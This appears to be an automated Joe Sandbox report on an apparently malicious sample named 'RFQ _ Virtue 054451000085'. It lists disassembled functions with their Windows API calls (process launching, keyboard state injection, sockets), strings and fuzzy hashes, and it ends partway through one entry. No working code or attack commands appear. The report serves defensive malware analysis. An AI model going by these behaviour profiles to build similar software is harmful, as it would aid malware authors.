Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE

Function 0046A41D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5

Strings

wait, xrefs: 0046A482
type cdaudio alias cd wait, xrefs: 0046A443
close cd wait, xrefs: 0046A4B0
set cd door , xrefs: 0046A466

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: SendString$_memmove
String ID: type cdaudio alias cd wait$ wait$close cd wait$set cd door
API String ID: 2279737902-2626315939
Opcode ID: 25991e495aa54eb53500ce1b036bd8f340046fa12330d61fcfdb58a0b1421220
Instruction ID: 3d8a09e445ca9db3d55ea58722ee79ad9098e4f2a1a367475f574b84354fba6f
Opcode Fuzzy Hash: 25991e495aa54eb53500ce1b036bd8f340046fa12330d61fcfdb58a0b1421220
Instruction Fuzzy Hash: 7F2153721182489ED700EB22CC91D6BB7A8EF9474CF50497FF08566091DE78AD09CB6B

Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
LoadStringW.USER32(00000000), ref: 00464319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
LoadStringW.USER32(00000000), ref: 00464336
_wprintf.LIBCMT ref: 0046435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00464357

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79

Function 0048D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetSystemMetrics.USER32(0000000F), ref: 0048D47C
GetSystemMetrics.USER32(0000000F), ref: 0048D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
ShowWindow.USER32(00000003,00000000), ref: 0048D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54

Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D

Function 004670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
EnterCriticalSection.KERNEL32(?), ref: 00467130
_memmove.LIBCMT ref: 0046717E
_memmove.LIBCMT ref: 0046719B
LeaveCriticalSection.KERNEL32(?), ref: 004671AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: e32de89284a9c114d21ef8a3444d82efd98b00da4c460f988641c10183c44841
Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
Opcode Fuzzy Hash: e32de89284a9c114d21ef8a3444d82efd98b00da4c460f988641c10183c44841
Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9

Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004861EB
GetDC.USER32(00000000), ref: 004861F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
ReleaseDC.USER32(00000000,00000000), ref: 0048620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68

Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

_wcstok.LIBCMT ref: 0046EC94
_wcscpy.LIBCMT ref: 0046ED23
_memset.LIBCMT ref: 0046ED56

Strings

X, xrefs: 0046ED93

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: f1a584b012c4e59189931977c389111896733e6790d1e2742b4354d1f45dd6a8
Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
Opcode Fuzzy Hash: f1a584b012c4e59189931977c389111896733e6790d1e2742b4354d1f45dd6a8
Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B

Function 00476B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
WSAGetLastError.WSOCK32(00000000), ref: 00476C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
inet_ntoa.WSOCK32(?), ref: 00476CA7

Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815

_strlen.LIBCMT ref: 00476D44
_memmove.LIBCMT ref: 00476DAD

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 19e8c2658f20f8476ca2da37bc64e6d1bda1729b0b31d87f1c8584a2e783eb2e
Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
Opcode Fuzzy Hash: 19e8c2658f20f8476ca2da37bc64e6d1bda1729b0b31d87f1c8584a2e783eb2e
Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59

Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9

Function 0048B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00C11C90), ref: 0048B3EB
IsWindowEnabled.USER32(00C11C90), ref: 0048B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
SendMessageW.USER32(00C11C90,000000B0,?,?), ref: 0048B512
IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
GetWindowLongW.USER32(00C11C90,000000EC), ref: 0048B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98

Function 0047F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047F448
_memset.LIBCMT ref: 0047F511
ShellExecuteExW.SHELL32(?), ref: 0047F556

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

GetProcessId.KERNEL32(00000000), ref: 0047F5CD
CloseHandle.KERNEL32(00000000), ref: 0047F5FC

Strings

@, xrefs: 0047F525

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 98a06052e6037ea6fb2970c60483761811ec359651e683da2548889ff509ee4d
Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
Opcode Fuzzy Hash: 98a06052e6037ea6fb2970c60483761811ec359651e683da2548889ff509ee4d
Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88

Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00460F8C
GetKeyboardState.USER32(?), ref: 00460FA1
SetKeyboardState.USER32(?), ref: 00461002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A

Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00460DA5
GetKeyboardState.USER32(?), ref: 00460DBA
SetKeyboardState.USER32(?), ref: 00460E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A

Function 004655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0046560A
_wcsncpy.LIBCMT ref: 0046563F
_wcsncpy.LIBCMT ref: 00465671
_wcsncpy.LIBCMT ref: 004656A4
_wcsncpy.LIBCMT ref: 004656E6
_wcsncpy.LIBCMT ref: 00465720
_wcsncpy.LIBCMT ref: 0046574F

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE

Function 0045D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
